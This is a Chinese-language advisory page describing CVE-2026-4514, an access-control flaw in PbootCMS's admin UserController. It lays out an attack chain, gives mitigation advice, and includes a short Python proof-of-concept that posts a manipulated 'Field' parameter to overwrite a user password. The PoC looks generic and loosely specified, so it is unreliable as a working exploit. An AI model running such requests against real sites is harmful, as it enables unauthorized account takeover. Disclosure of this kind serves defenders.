CVE-2026-4514 CVSS 6.3 中危

CVE-2026-4514 PbootCMS后台字段修改漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4514

漏洞类型

访问控制失效

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PbootCMS

漏洞概述

PbootCMS 3.2.12及之前版本存在访问控制失效漏洞。由于后台UserController.php对Field参数处理不当，远程攻击者可通过构造恶意请求绕过访问限制，导致未经授权的字段修改，影响系统机密性、完整性和可用性。

技术细节

该漏洞位于PbootCMS后台管理系统的UserController.php控制器中。系统在处理用户请求时，未对“Field”参数进行严格的类型检查和权限校验，导致存在逻辑缺陷。攻击者可利用此缺陷，构造包含恶意Field参数的POST请求，绕过原有的访问控制策略。由于CVSS评分显示攻击复杂度低且无需用户交互，远程的低权限攻击者能够利用此漏洞篡改后台用户的关键属性（如密码、权限组等），导致系统完整性受损，并可能进一步提权控制后台。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的是PbootCMS且版本在3.2.12或以下。

STEP 2

获取低权限账号

攻击者注册或获取一个普通低权限用户账号（PR:L）。

STEP 3

发送恶意请求

攻击者向UserController.php发送特制的POST请求，篡改Field参数来修改敏感字段。

STEP 4

绕过控制与提权

由于缺乏校验，服务器接受请求并修改数据库，导致访问控制被绕过，攻击者可能获得更高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# POC for CVE-2026-4514
# Target: PbootCMS <= 3.2.12

url = "http://target.com/admin.php?p=/System/User/save"
cookies = {"PbootCMS": "attacker_session_id"}

# Malicious payload manipulating the 'Field' argument
payload = {
    "Field": "password",  # Manipulated argument
    "value": "new_hacked_password"
}

response = requests.post(url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful: Field potentially modified.")
else:
    print("[-] Exploit failed.")

影响范围

PbootCMS <= 3.2.12

防御指南

临时缓解措施

建议立即将PbootCMS升级到最新版本以修补此漏洞。若暂时无法升级，应在WAF或Web服务器层面部署规则，严格拦截对UserController.php接口的非预期Field参数修改请求，并限制后台管理入口的IP访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表